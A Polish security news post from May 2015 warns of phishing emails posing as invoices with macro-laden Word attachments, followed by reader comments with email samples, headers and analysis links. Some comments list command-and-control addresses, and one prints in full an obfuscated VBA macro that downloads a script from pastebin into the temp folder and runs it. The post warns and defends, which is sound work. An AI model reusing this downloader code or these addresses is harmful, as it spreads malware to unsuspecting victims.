14:20
28/5/2015

Dziś od rana Czytelnicy zgłaszają nam masową wysyłkę e-maili, które nakłaniają do otworzenia załącznika (dokument Word), którym rzekomo ma być wystawiona faktura. Uważajcie na te wiadomości — faktury nie są prawdziwe i są zainfekowane.

W pierwszej wersji e-mail wyglądał tak:

Subject: Powiadomienie o wystawionych fakturach EA71/27/05/2015
Date: Thu, 28 May 2015 12:56:58 +0200
From: Mallory Hardin MalloryHardinhkjd@business.telecomitalia.it

Czesc,
Przesylam fakture. Prosze o zaplate.To jest ulotka opisujaca narzedzia z gabloty wystawienniczej.

Pozdrawiam,
Mallory Hardin
Specjalista ds. Komunikacji Marketingowej

W drugiej:

Subject: Powiadomienie o wystawionych fakturach 4299/27/05/2015
From: EarlineMalone EarlineMalonenkx@bynet.co

Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia 11.03.2004 r. o podatku od towarów i uslug. Mozna ja przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.
Earline Malone
Asystent ds. Finansowych

oraz

Od: Aron Jackson
Data: 28 maja 2015 13:18
Temat: Faktura 0844/27/05/2015

Dzien dobry.
Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.
Aron Jackson
Asystent ds. Finansowych

Analiza załączników trwa.

Jak widać, zmieniają się numery w temacie wiadomości zawartość wiadomości (powołanie na ustawę). Co ciekawe, autorzy zawsze (wszystkie próbki jakie mamy) to zagraniczne imiona i nazwiska.

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

144 komentarzy

Dodaj komentarz
  1. Już 6 adresów IP zbanowałem przez te maile…

  2. Otworzyłem plik z załącznika, czy to mogło zainfekować komputer ?

    • Nie, na pewno nie. Tak tylko wysyłają załączniki, bo im się nudzi.

  3. Zainfekowane czym? Co to robi, jak sprawdzić czy się aktywował na komputerze użytkownika?

  4. No dobra ale czy te załączniki zawierają coś ciekawego? W sensie to są jakieś zainfekowane pdf wykorzystujące luki w adobe czy tradycyjne (i już w sumie nudne) *.pdf.exe ?

  5. A co to za infekcja? Wiadomo? Jak działa, co robi? Jak żyć?

  6. Już dziś ponad 600 tego ze spamu wywaliłem i widzę, ze już prawie 200 nowych przyszło

    http://postimg.org/image/n0ti4rw53/full/

  7. Plik .doc uruchamia vbs który pobiera z hxxp:// 95.163.121.246 / bt / bt/ get.php plik.exe i jesteś wielkim członkiem ;) 3amchp.org

    p.s. plik jest podpisany cyfrowo i wystawiony przez Comodo dla 3 AM CHP …

  8. jak ktoś otworzył to jak to teraz wyczyścić?

  9. Uwaga:
    Wiadomości ewaluują, rano były to fragmenty kodu, o 13:45 dostałem już wiadomość z złącznikiem zawierający Trojana;
    https://www.virustotal.com/pl/file/66693c16dccc6b50546ef863b516af756aa6cb890fd68b64c79bbd21ebd9a16a/analysis/

    • Nie “wiadomości ewoluują” tylko “sygnatury antywirusów ewoluują”.
      BTW – na virustotal wrzuciłem tego doca jako pierwszy…

  10. w pośpiechu otworzyłem tego doca, czy wiadomo jakie są konsekwencje? Avast póki co nic nie wykrył

    • Avast w ogóle coś wykrywa?

    • > a v a s t

    • ahahahaahahahahahavast

  11. Paolo: Weź gąbkę i cifa :)

    • już brałem – nie pomogło – tylko się klastery porysowały

  12. https://www.hybrid-analysis.com/sample/6299df48a44b13f8f016390113a3393cd0ba226d547c86242f7dd32c26477646?environmentId=2

    Nowa treść:

    Subject: Faktura AC12/FD9/05/2015

    Dzien dobry,
    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)
    Pozdrawiam,
    Billie Benton
    LKJ “Lewada”

  13. Co ciekawe jak ja rano dostałem ten pliczek doc to virustoal nic nie wykrył a treść tego to

    https://onedrive.live.com/redir?resid=147AA9D22B8EF948!9410&authkey=!AFbvVeeDQtb8_Hs&ithint=folder%2c

  14. jedne z tych plików wysłałem do eseta około 13 i około 16 eset rozpoznaje go już jako szkodliwy plik, drugi trochę inny wysłałem później i jeszcze do aktualizacji bazy nie wprowadzili :(

  15. Sa rowniez maile niby od Europejskiego Centrum Zabezpieczen, w ktorym informuje ze twoje konto pocztowe ma slabe zabezpieczenia i masz 3 dni na jego zabezpieczenie po 3 dniach konto niby zostanie przejete przez hakera

  16. Dzien dobry.
    Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.
    Osvaldo Sheppard
    Asystent ds. Finansowych
    i doc z HTML D6E1E6_DE2CD47D7779.doc
    co robi nie wiem nie otwierałem ani nawet nie ściągałem

  17. Od: AvisWaltonajay@ensaladeras-erancel.com.ar
    Temat: Prosba o zaplacenie faktury 3894/891/05/2015
    Treść:
    Dzien dobry,

    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)

    Pozdrawiam,

    Avis Walton

    LKJ “Lewada”
    ——————–
    Dodatkowo fatalnie sformatowany mail :P

  18. Do mnie też sporo tego wpadło. I właśnie zauważyłem .doc, myślę sobie pewnie makrowe wirusy. Libre office wyłączył makra, plik jest pusty. No oprócz makr.

    “Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia 11.03.2004 r. o podatku od towarów i uslug. Mozna ja przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.

    Shannon Clemons
    Asystent ds. Finansowych”

  19. A i SpamAssasin mi wrzuca ten syf do SPAMU, ani jedna nie przeszła.

  20. Trojan łączy sie na adresy:
    http://95.163.121.246
    http://pastebin.com/download.php?i-km7egart
    http://savepic.ru

  21. ClamAV standardowo tego nie wykrywa, a zglaszanie/wysylanie im czegokolwiek co najmniej od roku mija sie z celem. nawet nie wiadomo czy ktos te maile czyta. mimo wszystko nowe bazy caly czas publikuja, wiec ja sie pytam co jest w tych bazach skoro polroczne trojany nadal nie sa wykrywane?

    czy ktos ma jakis lepszy kontakt do Tomasza Kojma z Clam-a?

    • ClamAV od kilku lat rozwijany jest przez Cisco. Tomasz Kojm pracuje nad nowym produktem http://www.skylable.com

  22. a ja mam 3 takie cuda :)

    Faktura 7064/05B/05/2015 Spam
    LoriHowardck@okpolaris.com Załącznik28 maja 2015 15:01
    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)
    Pozdrawiam,
    Lori Howard
    LKJ “Lewada”

    Powiadomienie o wystawionych fakturach C916/27/05/2015 Spam
    PercyRichardsondpdz@dsldevice.lan Załącznik28 maja 2015 14:03
    Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia 11.03.2004 r. o podatku od towarów i uslug. Mozna ja przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.
    Percy Richardson
    Asystent ds. Finansowych

    Powiadomienie o wystawionych fakturach 0D66/27/05/2015 Spam
    Daisy Wade Załącznik28 maja 2015 12:34
    Czesc,
    Przesylam fakture. Prosze o zaplate.
    To jest ulotka opisujaca narzedzia z gabloty wystawienniczej.
    Pozdrawiam,
    Daisy Wade
    Specjalista ds. Komunikacji Marketingowej

  23. Codziennie dostaję takie maile, ciągle jakieś faktury, umowy, gwarancje… :D

  24. A ja dostałem mail z załącznikiem doc od Ashley o treści:
    Dzien dobry! Od 1 stycznia 2015 roku zmienily sie warunki korzystania z serwera pocztowego. Prosimy sie zapoznac z dokumentem zalaczonym powyzej w ciagu 72 godzin. Kierownik oddzialu Dorota K.

    Received: from mx.poczta.onet.pl (unresolved [10.174.34.83]:56926)
    by ps11.m5r2.onet (Ota) with LMTP id 91B2CCD7CC628
    for ; Wed, 27 May 2015 08:47:33 +0200 (CEST)
    Received: from caloriesu.polandmails.com (223.79-54-92.telenet.ru [92.54.79.223])
    by mx.poczta.onet.pl (Onet) with SMTP id 3lxN4z5jbZzp3
    for ; Wed, 27 May 2015 08:47:31 +0200 (CEST)
    DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
    d=caloriesu.polandmails.com; s=caloriesu;
    h=from:subject:date:message-id:to:mime-version:content-type;
    Message-ID:
    Date: Wed, 27 May 2015 08:47:32 +0200
    From: Ashley
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16) Gecko/20080229 Thunderbird/3.1.3
    Subject: prosimy o przeczytanie
    To: “mojmail@op.pl”
    MIME-Version: 1.0
    X-ONET_PL-MDA-From: gelatinouslyw@caloriesu.polandmails.com
    X-ONET_PL-MDA-Spam: NO

  25. Dzisiaj dostałem dwa takie maile z “fakturami” w plikach DOC. Przeskanowałem plik VirusTotalem, nic nie znalazł. Jednak przezorności towarzyszyła ciekawość dlatego za pomocą konwertera on-line zamieniłem DOC na PDF a tam było kilka stron zapisanych “krzaczkami”.

  26. Swoją drogą jakim trzeba być idiotą by dać się nabrać na coś takiego?

    :Czesc,
    Przesylam fakture. Prosze o zaplate.To jest ulotka opisujaca narzedzia z gabloty wystawienniczej.:

    Dlatego czy jeszcze ktoś poza mną jest za reformą edukacji w tym kraju? Kiedyś były ZPT w podstawówce – może by tak przywrócić i młoteczkiem dzieciakom wiedzę do główek wbijać? Bo obecnie to byle dać dzieciątku tableta i już szczęście w rodzinie bo mały dupy rodzicom nie zawraca. A potem rosną nam takie elementy które z czytaniem rodzimego języka mają problemy, o pisaniu nie wspominając…

    • A jeśli ktoś prowadzi działalnosc i maile przychodzą na skrzynkę służbową? Nie trzeba być idiota żeby zrobić coś odruchowo ;) Lepiej pomóż jak możesz ( o ile możesz) biedakom którzy otworzyli ;)

    • Przecież to przez translator przepuszczone. Ci co za tym stoją raczej nie są z PL

    • przeciez to jest wynik tlumaczenia jakims translatorem. na 50% nie stoja za tym polacy.

    • Jak będziesz miał firmę to może kiedyś zrozumiesz jak można się na coś takiego dać nabrać…

    • Ale ja przecież wiem że to z translatora! Napisałem tylko że wielu userów klika wszystko na pałę, czy to instalując crapware czy ściągając pocztę. I tu jest problem głównie.

      Firmy to osobna sprawa, ale nie można tłumaczyć tym zwykłej ignorancji użytkowników! Bo potem wychodzą z tego wesołe kwiatki pt. przelanie 3.7mln na podstawione konto…

    • Idiotą?
      Ale ja znam LKJ Lewada (także e-mail jest z sensem) – ponadto to nie to samo co .rar, .zip … tylko doc
      Otworzyłem – czy coś sie pojawiło, jak to wyrzucić?

  27. Informuję znajomych ;D
    http://postimg.org/image/deyikps63/

  28. ma ktoś polisę z link4? meila podawałem chyba tylko tam

  29. z analizy wynika, ze po otwarciu m.in. pobiera przez ftp cryptolockera :/
    poza tym, po zainfekowaniu kazdy inny dokument worda bedzie juz zainfekowany
    kiepsko to wyglada

  30. W załącznikach są pliki Wordowskie ze złośliwym skryptem VBA. Po uruchomieniu skrzypt wrzuca się w %user%\appdata\local\temp\ (w win 7) i tam tworzy plik exe, który przez mbama jest wykrywany jako jakiś backdoor. Sam VBA pobiera plik z tego adresu: 96.163.121.246 / bt / bt / get. php
    Zauważyłem, że po wyłączeniu antywirów i pozwoleniu na przejście tego skryptu IE przestał w ogóle działać, natomiast antywirusy po odpaleniu blokują na Explorerze ruch na adres 95.163.121.215..

  31. Dostałem tego maila i otworzyłem z ciekawości bo zazwyczaj .rar przychodziły. Niestety mój ubogi word nie obsługuje makr i nic się nie otworzyło :P

  32. Ortografia i gramatyka przebojowa. I to “czesc” na początku. Skoro “powołują ustawę” to niech podadzą Nr Dziennika Ustaw.

  33. Mam taki pliczek i kaspersky nie wykrywa w nim niczego podejrzanego. 18.00 – hm od rana to już powinien być wpisany do bazy?

  34. Ja dostałem taką:
    ———————————

    Drodzy Panstwo, w nazwiazaniu do rozmowy telefonicznej ze srody, tj. 13/05,
    przesylam fakture VAT do rozliczenia.

    Haslo do faktury to: faktura


    Marek Twardowski
    Mlodszy pracownik administracyjny

    Rota TRANS Sp. z o.o.
    Aleja Konstytucji 3 Maja 102
    66-400 Gorzow Wielkopolski

  35. Dostałem wczoraj wieczorem coś podobnego (na adres prywatny), jednak nie było to podpisane jako faktura, ale “Zmiana warunków umowy”, w treści coś w stylu “Przesyłamy nową wersję umowy do przejrzenia w załączniku”.

  36. Właśnie miałam pisać do Was w tej sprawie. Sprawdzałam pocztę taty, odwiedziłam folder spam i moim oczom ukazały się o to takie “fakturki”. Z tego co widzę, wszyscy dostają tę samą treść z różnymi numerami oraz nazwiskami – co wspomnieliście. Na pocztę przychodzą również inne ciekawe maile, ale taki chyba urok poczty na onecie. Mimo że jest ona używana raz w miesiącu tylko do sprawdzenia, czy nie przyszło coś ważnego, znajduje się tam taki spam, że nie wiadomo czy się śmiać, czy płakać. Dobrze, że żadne z rodziców nie umie obsługiwać komputera, bo zastanawiałabym się w jakie linki musieli klikać.. ;)

  37. Przepraszam, na interii, nie na onecie ;)

  38. ~14 przypełzły mutacje w rodzaju:

    Return-path:
    Envelope-to: xyz@domain.tld
    Delivery-date: Thu, 28 May 2015 14:XX:XX +0200
    Received: from alstar.kei.pl ([195.149.226.123] helo=smtp.alstar.kei.pl)

    Received: from 213.241.52.213 (HELO groove.it-netstudio.pl) (zawila@alstar.pl@213.241.52.213)
    by 195.149.226.123 with ESMTPA; 28 May 2015 11:XX:XX -0000
    Date: Thu, 28 May 2015 14:XX:XX +0200

    From: =?UTF-8?Q?zawila=40alstar=2epl?=

    Dzien dobry=20

    Prosze jak najszybciej oplacic zamowienie nr 344 z dnia 2015.05.02 . Jesli =
    nie otrzymamy przelewu do konca miesiaca przekazemy dlug do kruka. Przesyla=
    m skan pisma zwizanego z nieoplacona Faktura.pdf .=20

    Pozdrawiam Joanna Wilenska glowna ksiegowa

    zawila@alstar.pl

  39. Własnie zajrzałem do SPAMu na swojej poczcie i się przeraziłem. Mam chyba tego ze 100 sztuk. :P

  40. Ten był u mnie:

    Dzien dobry,

    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)

    Pozdrawiam,

    Arron Pollard

    LKJ “Lewada”

  41. Po otwarciu doca prosi o uruchamianie makr. Potem pobrany jest programik do wykrawanie haseł + trojan następnie z różnych zarażonych kompów (w innych firmach) wysyłane są wiadomości na kolejne adresy.

    • źródło analizy? czy jesteś z tych, co tak sobie p***dolą, bo gdzieś tam usłyszeli w warzywniaku jednym uchem?

    • Potwierdzam wiekszosc. Syf przejal haslo (z OE …) i zaczal rozsylac sie dalej. Uzytkownik zauwazyl problem dopiero gdy dostal kilkaset zwrotek o niedostarczonych mailach.

  42. Cóż społeczeństwo nie jest najmądrzejsze. Wykorzystują to twórcy wirusów. Kukiz nawet swojego programu nie podał a ma tyle zwolenników.

    • Czy którykolwiek polityk / partia zrealizowali swój program po wyborach? Więc po co przejmować się programem?

  43. zgooglowałem to “LKJ “Lewada”” i oni już znają temat. Poczytajcie w ‘aktualnościach’
    http://www.kjlewada.pl/

  44. Najgorsze, że przez takie wałki potem blokowana jest obsługa makr wszystkim pracownikom a to czasem cholernie przydatne narzędzie (makra + modyfikacje bezpośrednio w VBA)

    • Przyznam szczerze, że po tej akcji i dziesiątkach otrzymanych dzisiaj w firmie maili – zablokowałem wszystkie makra;)

  45. Śmieszna sprawa, dziś w firmie pojawiły się takie maile i oczywiście Pani musiała go zobaczy bo przecież napisane że faktura … i już byśmy byli zarażeni gdyby nie błąd we wiadomości. Plik załączony do maila miał parametr “Content-Transfer-Encoding: 7bit” co powodowało że nie był dekodowany i zapisał się jako znaczki Base64. Nod32 tego nie wykrył ale niektóre sobie poradziły z base64: https://www.virustotal.com/pl/file/d173f45ecfb9d44de6b93fa099892861c81bec74ac60ab276f2754a11f5afa95/analysis/1432840515/

    Po dekodowaniu z base64 mamy plik który robi to:
    https://www.virustotal.com/pl/file/f4d19366356bdf77e1cbdd6e4406d50d7aeaef4616f903edd0655258f16df0be/analysis/1432840412/

    Zmieniając w mailu 7bit na Base64 plik dekodowany jest poprawnie ….

  46. U mnie był taki:

    Dzien dobry.

    Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.

    Sonya Roach
    Asystent ds. Finansowych

  47. No dobra, ale czy istnieje jakiś removal tool ? Jeśli nie, to zwykle w takich sytuacjach można się takowego spodziewać ? Jaki naiwne dziecko, przez nieuwagę na oczach sekretarki zainfekowałem jej komputer. Wiem, że wstyd, ale trzeba coś dalej z tym zrobić.

  48. Ok, ale czym to grozi jeśli otworzyło się tego maila? Bo załącznik se nie otwiera…

  49. znajoma otworzyła jeden z tych maili zeskanowała avastem pojawiła się część kodu w wordzie pytanie co teraz zrobić jak usunąć to co weszło i jak się zabezpieczyć

  50. The bot is designed to steal banking credentials by hooking browsers like Internet Explorer, Chrome, Firefox and Opera. It is also worth noting that the criminal has code-signed their Dridex executables to evade malware filters.

    Tako rzecze
    https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/

  51. LibreOffice tez podatny na makra?

  52. ja dostałem ich kilka:
    Dzien dobry,

    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)

    Pozdrawiam,

    Liliana William

    LKJ “Lewada”

  53. W podobny sposob probowano zachecic mnie do otwarcia zalacznika z faktura, nawiazujac do rozmowy telefonicznej rzekomo przeprowadzonej w dn. 13.05.2015r z pracownikiem firmy Komputronik…Zastanawiajace bylo to, ze jej otwarcie wymagalo wpisania hasla…”faktura”…i to mnie zastanowilo…dodatkowo nic ostatnio w Komputroniku nie zamawialam…Zadzwonilam do oddzialu Komputronika w Gorzowie Wielkopolskim i tam poinormowano mnie, ze nie jestem jedyna na celowniku oszusta, oszustow…Pozdrawiam

  54. Również otrzymałem maila z “fakturą” i wczoraj otworzyłem załącznik w Thunderbirdzie. Posiadam pakiet Open Office i otworzyły się tylko nieczytelne znaczki. Nie mam też żadnego pliku .exe utworzonego wczoraj w %user%\appdata\local\temp\ Czy to znaczy, że jestem bezpieczny? Malwarebytes Antimalware nic nie znalazł.

  55. Witam

    Też dostałem kilka maili z załącznikami doc. Po otworzeniu oprócz znaczków nic się nie dzieje ( dodam ze mam włączoną opcje “makra z powiadomieniem” w wordzie ). Żadnych plików exe nie znalazłem w podanych lokalizacjach…Na wszelki wypadek poblokowałem kilka IP na firewallu ( ◾5.45.116.69:5443 – Estonia◾5.63.154.228:5443 – Russia◾62.76.191.84:5443 – Russia ; 96.163.121.246 ; 95.163.121.215 ) . Norton po pełnym skanie nic nie wykrył….

  56. ok… tylko zgodnie z prawem faktura przesyłana w formie elektronicznej musi mieć format, który nie pozwala zmienić zawartości (np. pdf) więc dlaczego ktoś otwiera Worda… tutaj już chyba gubi ciekawość…(?) :)

    • Nie ma czegoś takiego jak format, który nie pozwala zmienić zawartości.

  57. Dziwne, u mnie nic nie ma, nawet na emailu który podaje byle gdzie, żeby się zalogować na 5 min

  58. od: WillaButlernwhy@plas-tec-inc.com

    Dzien dobry,
    Bardzo prosze o zaplacenie naszej fakturki nr 23/2015 na kwote 5600,00 zl ( wpisowe zawodników.)
    Pozdrawiam,
    Willa Butler
    LKJ “Lewada”

    TerrieMortonqxs@paymebackapp.com
    Informujemy, ze zalaczony dokument jest faktura w rozumieniu Ustawy z dnia 11.03.2004 r. o podatku od towarów i uslug. Mozna ja przechowywac w formie elektronicznej lub papierowej po wydrukowaniu.

    Terrie Morton
    Asystent ds. Finansowych

    DorisCrawfordoth@kabel-deutschland.de

    Dzien dobry.

    Informujemy, ze na Panstwa koncie zostaly wystawione nowe faktury. Informujemy, ze zalaczony dokument jest faktura.

    Doris Crawford
    Asystent ds. Finansowych

  59. Niebezpieczni, pewnie nie sprawdzacie ilu ludzi z tu piszących potwierdziło że otworzyli załącznik? Ciekawa statystyka, można by się o jakąś sondę pokusić.

  60. A oto i treść makra która jest w pliku doc z fakturą którą ja dostałem:
    Sub adobe()
    If 338496 = 338496 + 1 Then End
    If 1777 < 63 Then
    If 922166 = 922166 + 1 Then End
    If 9127 < 66 Then
    MsgBox ("mqbMRSGm18")
    End If
    If Len("kTtPMGkW1977") = Len("LoICefHZ") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("PgiqSBzW25")

    End If
    If Len("mgRPvgyP4941") = Len("XKiVYDTj") Then
    If 754292 = 754292 + 1 Then End
    If 1597 < 98 Then
    MsgBox ("QDFQvwsl44")
    End If
    If Len("leKPUFuQ2447") = Len("dwjhnLmV") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 289827 = 289827 + 1 Then End
    If 2795 < 83 Then
    MsgBox ("TWgPRntI35")
    End If
    If Len("ZjWbMEYp6168") = Len("tMcDezyH") Then
    MsgBox ("Error !!!")
    End If
    Set wwwwwwwWWWef = CreateObject("MSXML2.XMLHTTP")

    If 668478 = 668478 + 1 Then End
    If 7326 < 76 Then
    If 843586 = 843586 + 1 Then End
    If 5284 < 56 Then
    MsgBox ("YdAPKvnz48")
    End If
    If Len("WDPjhqIS6134") = Len("GyoXohWN") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("wvzUYfHd21")

    End If
    If Len("eFyTGYQR8176") = Len("ViRqIQBK") Then
    If 827956 = 827956 + 1 Then End
    If 8176 < 22 Then
    MsgBox ("sqNJjLlS98")
    End If
    If Len("WpxjepcA9927") = Len("xFNRqICo") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 695995 = 695995 + 1 Then End
    If 3797 < 31 Then
    MsgBox ("lFOyNQPD14")
    End If
    If Len("UgJDcxKv4648") = Len("ZUhkjZtQ") Then
    MsgBox ("Error !!!")
    End If
    wwwwwwwWWWefsd = StrReverse("tth") + StrReverse("i?php.daolnwod/moc.nibetsap//:p") + StrReverse("tRagE7MK=")

    If 766241 = 766241 + 1 Then End
    If 2353 < 78 Then
    If 358698 = 358698 + 1 Then End
    If 6276 < 37 Then
    MsgBox ("IntxJmEL41")
    End If
    If Len("BQYEKrLa1449") = Len("AgpJaZlU") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("iIXrnARR68")

    End If
    If Len("cLcqZqMD3213") = Len("NxavPOll") Then
    If 311656 = 311656 + 1 Then End
    If 9855 < 26 Then
    MsgBox ("hfwirWWH18")
    End If
    If Len("hlmvCWTG3128") = Len("pSMrJNLe") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 188696 = 188696 + 1 Then End
    If 7999 < 11 Then
    MsgBox ("cKtcDSsJ24")
    End If
    If Len("zcGWliBQ8749") = Len("hYpKCMaY") Then
    MsgBox ("Error !!!")
    End If
    Call wwwwwwwWWWef.Open("POST", wwwwwwwWWWefsd, False)

    If 116312 = 116312 + 1 Then End
    If 8812 < 72 Then
    If 325834 = 325834 + 1 Then End
    If 3781 < 31 Then
    MsgBox ("NBPriiZI76")
    End If
    If Len("UhDzjAvN4641") = Len("ZIdUqYQf") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("LKJbwHlX65")

    End If
    If Len("ulBuLZbY9662") = Len("aScQSUDM") Then
    If 772942 = 772942 + 1 Then End
    If 1421 < 79 Then
    MsgBox ("uDbJFajH69")
    End If
    If Len("cVaBHPYV2361") = Len("BARdVoyR") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 538689 = 538689 + 1 Then End
    If 6928 < 86 Then
    MsgBox ("jiNGNOBv17")
    End If
    If Len("CcrDozMJ9282") = Len("ysQOTLTH") Then
    MsgBox ("Error !!!")
    End If
    wwwwwwwWWWef.Send

    If 546418 = 546418 + 1 Then End
    If 2947 < 85 Then
    If 765841 = 765841 + 1 Then End
    If 7655 < 42 Then
    MsgBox ("uPFSBHDz83")
    End If
    If Len("ttlAgLgE8496") = Len("YOCGckDp") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("KcMdMJRB36")

    End If
    If Len("AcjQYuIG6211") = Len("eaMBFTiw") Then
    If 564373 = 564373 + 1 Then End
    If 8698 < 89 Then
    MsgBox ("ALDHomVW91")
    End If
    If Len("ooHGkFMd9548") = Len("eAhlqLin") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 329831 = 329831 + 1 Then End
    If 3195 < 96 Then
    MsgBox ("QdgOYkDo48")
    End If
    If Len("IIWbXmgP4955") = Len("pscStLFj") Then
    MsgBox ("Error !!!")
    End If
    Set wwwwwwwWWWefv = CreateObject("Scripting.FileSystemObject")

    If 544281 = 544281 + 1 Then End
    If 6974 < 87 Then
    If 372139 = 372139 + 1 Then End
    If 7256 < 99 Then
    MsgBox ("rTmdDVxo82")
    End If
    If Len("rQlEUCuo1429") = Len("sbabrGJi") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("hsTlqlWT18")

    End If
    If Len("XZOjlSHC9347") = Len("JWiXdKrq") Then
    If 664139 = 664139 + 1 Then End
    If 3135 < 96 Then
    MsgBox ("BTQVtNEn48")
    End If
    If Len("OTicJjUh7398") = Len("qoQPNGyX") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 421477 = 421477 + 1 Then End
    If 1963 < 13 Then
    MsgBox ("pCjTfHDZ95")
    End If
    If Len("ccbsQAWf2713") = Len("lJVJRUin") Then
    MsgBox ("Error !!!")
    End If
    wwwwwwwWWWefvd = Environ("TEMP") & "\wwwwwwwWWWefs.vbs"

    If 984352 = 984352 + 1 Then End
    If 3533 < 81 Then
    If 715935 = 715935 + 1 Then End
    If 1849 < 64 Then
    MsgBox ("ruFGZLkN87")
    End If
    If Len("mkhCEZUo4113") = Len("XWLpQayG") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("gJOtIluI71")

    End If
    If Len("TzqdPexJ4383") = Len("uTDbKAXc") Then
    If 734318 = 734318 + 1 Then End
    If 4182 < 44 Then
    MsgBox ("DnGFrhvK27")
    End If
    If Len("DYFtVhoJ8355") = Len("IBdPJmxt") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 337231 = 337231 + 1 Then End
    If 7962 < 35 Then
    MsgBox ("QhBNvjiz49")
    End If
    If Len("znninNcq1235") = Len("EremIvCJ") Then
    MsgBox ("Error !!!")
    End If
    Set wwwwwwwWWWefvdv = wwwwwwwWWWefv.CreateTextFile(wwwwwwwWWWefvd, 2)

    If 565682 = 565682 + 1 Then End
    If 2495 < 27 Then
    If 851687 = 851687 + 1 Then End
    If 9148 < 94 Then
    MsgBox ("YhfLgqei49")
    End If
    If Len("fTjJcEBb1999") = Len("iVHxkOsD") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("fxSJumlS91")

    End If
    If Len("ACMvRybx3355") = Len("xhlevsDP") Then
    If 716435 = 716435 + 1 Then End
    If 1754 < 63 Then
    MsgBox ("rtXqGQrX53")
    End If
    If Len("mhckHmmt2614") = Len("XLaTVLLQ") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 387865 = 387865 + 1 Then End
    If 4521 < 62 Then
    MsgBox ("ePBaVKsl73")
    End If
    If Len("PNzBuqiQ7784") = Len("RlnRNjwB") Then
    MsgBox ("Error !!!")
    End If
    wwwwwwwWWWefvdv.Write wwwwwwwWWWef.ResponseText

    If 895754 = 895754 + 1 Then End
    If 8854 < 21 Then
    If 253678 = 253678 + 1 Then End
    If 2433 < 55 Then
    MsgBox ("nnTnXpzX21")
    End If
    If Len("cWqhssEc3284") = Len("QrTdHBTl") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("daHRTmRG96")

    End If
    If Len("CadekQIT9714") = Len("vRHjnpus") Then
    If 582975 = 582975 + 1 Then End
    If 7875 < 73 Then
    MsgBox ("byTvEiVi93")
    End If
    If Len("LanuiGxF8735") = Len("aGizTYiD") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 415795 = 415795 + 1 Then End
    If 4954 < 95 Then
    MsgBox ("SyJThaEj57")
    End If
    If Len("PAxmYetK5815") = Len("stNIFARv") Then
    MsgBox ("Error !!!")
    End If
    wwwwwwwWWWefvdv.Close

    If 245859 = 245859 + 1 Then End
    If 3981 < 57 Then
    If 754291 = 754291 + 1 Then End
    If 4381 < 61 Then
    MsgBox ("QSGQwHgk44")
    End If
    If Len("QKFzhHVj7554") = Len("MYwCDIOh") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("VqPNbOlu78")

    End If
    If Len("TAFBIzfb6254") = Len("FgwMyMBv") Then
    If 172172 = 172172 + 1 Then End
    If 8215 < 47 Then
    MsgBox ("vDbVdosr99")
    End If
    If Len("iDXxBvhM2578") = Len("OjbPiCGn") Then
    MsgBox ("Error !!!")
    End If
    MsgBox ("Error !!!")

    End If
    If 599952 = 599952 + 1 Then End
    If 2747 < 21 Then
    MsgBox ("qDpylldc94")
    End If
    If Len("bfkDJymi3698") = Len("lUHlQqIw") Then
    MsgBox ("Error !!!")
    End If
    Set wwwwwwwWWWefvdvs = CreateObject("Shell.Application")

    wwwwwwwWWWefvdvs.Open Environ("TEMP") & "\wwwwwwwWWWefs.vbs"
